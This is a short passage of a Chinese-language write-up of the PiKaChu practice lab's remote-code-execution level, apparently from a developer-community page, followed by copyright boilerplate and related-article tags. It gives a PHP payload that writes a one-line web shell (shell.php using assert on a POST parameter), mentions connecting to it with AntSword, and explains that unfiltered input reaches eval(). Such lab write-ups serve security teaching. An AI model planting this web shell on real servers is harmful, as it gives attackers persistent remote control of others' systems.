五、上马上马
payload:fputs(fopen(‘shell.php’,‘w’),’<?php assert($_POST[fin]);?>’);
到本关目录下查看,多了一个马
蚁剑链接一下
查看一下漏洞原因,用户输入没过滤就直接传到eval()函数里面去了
[PiKaChu靶场通关]RCE远程代码执行(下)
2022-01-06
136
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《
阿里云开发者社区用户服务协议》和
《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写
侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
[PiKaChu靶场通关]RCE远程代码执行
目录
相关文章
|
27天前
|
安全
网络安全
数据安全/隐私保护
|
27天前
|
XML
安全
JavaScript
|
10月前
|
安全
Windows
|
安全
Linux
Windows
|
Windows
|
XML
安全
数据格式
|
PHP
|
SQL
安全
关系型数据库
|
安全
PHP